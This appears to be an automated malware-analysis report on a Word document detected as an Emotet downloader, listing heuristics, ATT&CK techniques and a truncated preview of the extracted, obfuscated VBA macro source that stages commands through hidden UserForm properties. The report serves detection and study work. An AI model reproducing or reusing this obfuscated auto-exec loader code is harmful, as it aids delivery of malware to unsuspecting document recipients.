MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains VBA macros, specifically a Document_Open macro that utilizes CreateObject, indicative of a downloader. ClamAV detection explicitly names this as 'Doc.Downloader.Emotet-7464372-0'. The macro's obfuscated nature and use of hidden UserForm properties for command staging suggest a sophisticated downloader designed to execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-7464372-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7464372-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10697 bytes |
SHA-256: 46bc66e7944768f389fb49a211b7889dfddf333fea30766c468c11f7e6f20d48 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Cfifdbzh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Txqcvasu, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select Case Jirqxvrcjakzc
Case Dhgzjyzqjcpm
Oyrcksll = Sin(Hhoupuixdsloy)
Aksioijycvctx = CStr(Kriksbjf)
Trjzoazlcji = 324
Knxjmzma = Sin(Yitfnmxre)
Uqaynuciuivr = CStr(Wuswgnoilkrvu)
Esdbjqwxkzeks = 567
Dqehrsfuydflf = Sin(Raqipprqf)
Whwbdvso = CStr(Rmvgzyfx)
Rheieujai = 5645
End Select
For Yarvxxxaktrjf = Vcqqmtcciod To Jlrfubslelcai
While Layyiryhkrag <> Igtjzryblodhb
Nqewirhqefg = Houvwnvej * Atn(Fvjpjvbph) * (Bvkogaqodtgtu + Iknvmeyvqnhs)
Wend
Next
Select Case Vehtpovkfitu
Case Fhtiknlvszx
Zpuuttwposwh = Sin(Heiqeqrbekhf)
Zmhwjsvvlo = CStr(Fzrowakt)
Jjtpdxkjmntm = 324
Kaygxmsu = Sin(Ksjqnhuf)
Dydtpykbb = CStr(Tjqdwcdvs)
Sqelntwftnh = 567
Lxerzbqsfvrit = Sin(Frjmingmoek)
Wstmbsszx = CStr(Rjxnunduheabd)
Kfkpnokkwmcfg = 5645
End Select
For Rhenvzqtsbbq = Vqprcimo To Hgybasixtnntx
While Ztlsomxbjavmn <> Hczfgoapsase
Nctztcobwumj = Affvtagkurk * Atn(Esrviafvybnub) * (Gfswjlpnu + Wpdhcpjdki)
Wend
Next
Select Case Xutfhjzrc
Case Fxvmwkubs
Hmzcyhinjzpn = Sin(Jdcqrdzqn)
Kpwnatild = CStr(Fekrioviq)
Engrlasuqye = 324
Rmzifgbducx = Sin(Zukvffxvl)
Jiitixhbj = CStr(Wondjilj)
Sfaxkutyxt = 567
Tywyivwv = Sin(Kzywicwojby)
Chvycocmcts = CStr(Gkzqmpmevbz)
Qcijefvhuq = 5645
End Select
For Ugubhfgatwlpt = Kmggwkpxzd To Nzglultsisc
While Snsurtqpvkvnk <> Ejuypptbnk
Zwbsjskd = Cikbarokyjuhn * Atn(Eyfzlfkaprsus) * (Aoohgmonpbmc + Jrjcteued)
Wend
Next
Xgmmntpfabj
End Sub
Attribute VB_Name = "Nvexppvwbclb"
Attribute VB_Base = "0{A6D80BC6-2311-44CA-A76A-75F767D585D2}{366FF9DB-38AE-4D4B-A864-A07D6AC66334}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Uyrkuoeaboav"
Function Wyjpoleontqe()
Select Case Pudafirtriera
Case Ethbtoflgkn
Rcdncrfu = Sin(Uvfwlerxpk)
Ncqpkjiwqrbq = CStr(Erpjovsjmgn)
Hpnywjyobxnh = 324
Ptdupuwzah = Sin(Vzepkbsqagcsf)
Adubcsjd = CStr(Myxwipfsan)
Lmloelirkp = 567
Vvfgddlvogy = Sin(Tsrxaeseqrhq)
Yvyzxpgbmjz = CStr(Cdwfoitltrtkk)
Fdypppnapg = 5645
End Select
For Osfhykhqbum = Ucfefomav To Ljahocgynv
While Njvaczjkrgiu <> Wksontwww
Zcznoemqjr = Ojallreagu * Atn(Wgzhlxrng) * (Wkwdbvde + Ademhkfr)
Wend
Next
Svoeisqwp = Cfifdbzh.Txqcvasu
Select Case Ywnwqvijnirak
Case Ixsdlntodw
Gvwqliwgnveis = Sin(Xamjybve)
Svleikaex = CStr(Qsfsokxnsjl)
Voqmnvkqqk = 324
Kbfkeeuzmh = Sin(Rjryrnvhl)
Ttnqbrxahm = CStr(Jscofrka)
Judemzcpl = 567
Smrqnshoga = Sin(Fifozppbyu)
Snxfyysbes = CStr(Lysydmhfo)
Wgldzvznyygxz = 5645
End Select
For Qiithmrz = Xqxlmhvk To Znutfefr
While Asdbvzxvb <> Ghccecbmr
Lucdnpochas = Envqnkai * Atn(Sfsqacdfptnhi) * (Lhhzdenibxrg + Hkehzjyvynzdv)
Wend
Next
Twyotyzlmuu = Svoeisqwp + Nvexppvwbclb.Kdxtincasrpzy + Nvexppvwbclb.Fhwefplfn + Nvexppvwbclb.Ejngnmrbmmuof
Select Case Rcmsldowoup
Case Fqejjmrliy
Doirgesgqe = Sin(Lbolnkoemqmf)
Apybidcjhpff = CStr(Xauaxmyixgy)
Fwmbdkkech = 324
Qqctzgibyglwm = Sin(Xrssdkswmuoc)
Lvtfehvwpyzpw = CStr(Kqpvpnnkollyt)
Lendnlsqhbzac = 567
Oogxbeygfkxk = Sin(Sibgqnvbsyns)
Uqmlqvxxs = CStr(Umxitpanxos)
Lgxmvhjjeqmp = 5645
End Select
For Ujvvqerway = Inectcsszkylb To Fqwksvdgebs
While Cpfzswyvebxk <> Nkkkufrmg
Bdfhzbaazpk = Tfmraozavqpvu * Atn(Vbqjblqtsofaw) * (Pcflrptzlremf + Lfkbfyzbdnc)
Wend
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.